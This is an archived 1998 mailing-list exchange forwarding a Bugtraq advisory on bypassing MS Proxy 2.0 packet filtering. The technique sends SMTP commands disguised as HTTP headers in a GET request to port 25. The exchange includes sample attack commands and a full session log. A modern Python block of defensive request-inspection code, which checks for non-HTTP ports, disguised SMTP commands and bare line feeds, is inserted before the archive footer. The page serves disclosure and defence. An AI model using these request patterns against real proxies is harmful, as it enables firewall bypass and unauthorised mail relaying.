FW: WARNING: By-passing MS Proxy packet filtering

From: Jordan Mendelson <jordy@dont-contact.us>
Date: Fri, 9 Oct 1998 18:53:54 -0400

As far as I can tell, Squid is not vulnerable to this style of exploit (to a
point). I was unable to pass a ^J through an HTTP header to get something on
its own line (required for SMTP "." and anything else which will not allow

Can anyone confirm this? Standard attack would look like this:

# telnet squid 3128
GET http://mail.yourhost.com:25/ HTTP/1.0
helo yahoo.com :
mail from: someone@yahoo.com
rcpt to: someone@yourhost.com
data :

There is a similar gopher attack, however gopher is probably disabled on
everyone's Squid proxy :)


Jordan Mendelson     : http://jordy.wserv.com
Web Services, Inc.   : http://www.wserv.com

-----Original Message-----
From: Bugtraq List [mailto:BUGTRAQ@netspace.org] On Behalf Of Mnemonix
Sent: Wednesday, October 07, 1998 2:11 AM
To: BUGTRAQ@netspace.org
Subject: WARNING: By-passing MS Proxy packet filtering

Whilst playing around with Microsoft's Proxy Server 2, I came across an
interesting "feature" that could allow someone to by-pass packet filtering
if enabled.

The essence of the "exploit" is to connect to a remote host on a given port
- in the example provided I have used the SMTP port (25) - through the Web
Proxy Service.

What you attempt to do is disguise service-specific commands as HTTP
headers. Below is a log of a telnet session where I've telnetted to the Web
Proxy Service, made a GET request and passed off the SMTP commands as HTTP
headers :

GET http://smtpmail.globalnet.co.uk:25/ HTTP/1.0
mail from: me@here.com
rcpt to: mnemonix@globalnet.co.uk
data :
Subject: This is the Subject Line
 This is the body of the message. To get here do a Ctrl+J. To place a
single dot on a line do another Ctrl+J

220 sand2.global.net.uk ESMTP Exim 1.92 #1 Wed, 7 Oct 1998 06:51:37 +0100
500 Command unrecognized
500 Command unrecognized
500 Command unrecognized
250 <me@here.com> is syntactically correct
250 <mnemonix@globalnet.co.uk> is syntactically correct
354 Enter message, ending with "." on a line by itself
250 OK id=0zQmVd-0007md-00
500 Command unrecognized
500 Command unrecognized

If the packet filter only allows incoming HTTP requests and the Web-Proxy
Service gives Everybody access this could be used to gain entry to the
"protected" network.

This was tested on NT Server 4.0, Service Pack 3 with important hotfixes,
IIS 3.0 and MS Proxy 2.0
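As an added example (not code from either poster, and not Squid's or MS Proxy's own logic), the request inspection below shows the checks a forward proxy can apply to refuse the pattern both messages describe: a GET aimed at a non-HTTP port, header lines that are really SMTP verbs, and a bare Ctrl+J smuggled inside a header so that a lone "." reaches the wire. The allowed-port list, the header regex and the two sample requests are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit

# Ports a forward proxy may relay plain HTTP to. Assumed list for this
# example (Squid's Safe_ports ACL plays the same role); 25 is deliberately
# absent, so a GET to host:25 is refused before any header is relayed.
SAFE_PORTS = {80, 443, 8080}
SMTP_VERBS = {"HELO", "EHLO", "MAIL", "RCPT", "DATA", "QUIT", "RSET", "VRFY"}
# RFC 7230 field-name: one token immediately followed by ':' (no space)
HEADER_RE = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+:")

def inspect_request(raw: bytes) -> list:
    """Return the reasons a proxy should refuse this request ([] = clean)."""
    reasons = []
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].decode("latin-1").split(" ")
    if len(parts) != 3 or not parts[1].startswith("http://"):
        return ["malformed request line: %r" % lines[0]]
    port = urlsplit(parts[1]).port or 80
    if port not in SAFE_PORTS:
        reasons.append("target port %d is not an allowed HTTP port" % port)
    for line in lines[1:]:
        text = line.decode("latin-1")
        if "\n" in text:
            # A bare ^J survived the CRLF split: the client wants its own line
            # on the wire (e.g. the lone "." that terminates SMTP DATA).
            reasons.append("bare LF inside header line %r" % text)
            text = text.split("\n", 1)[0]
        if text.split(" ", 1)[0].upper() in SMTP_VERBS:
            reasons.append("SMTP command disguised as header: %r" % text)
        elif not HEADER_RE.match(text):
            reasons.append("malformed header line: %r" % text)
    return reasons

# Constructed samples modelled on the sessions in the post (hostnames are
# placeholders); the "\n" in the last header stands for the Ctrl+J.
ATTACK = (b"GET http://mail.example.com:25/ HTTP/1.0\r\n"
          b"helo yahoo.com :\r\n"
          b"mail from: someone@yahoo.com\r\n"
          b"rcpt to: someone@example.com\r\n"
          b"data :\r\n"
          b"Subject: test\n.\r\n\r\n")
NORMAL = (b"GET http://www.example.com/ HTTP/1.0\r\n"
          b"Host: www.example.com\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("attack", ATTACK), ("normal", NORMAL)):
        print(name, inspect_request(req) or "allowed")
```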
Received on Fri Oct 09 1998 - 15:56:32 MDT

This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 16:42:24 MST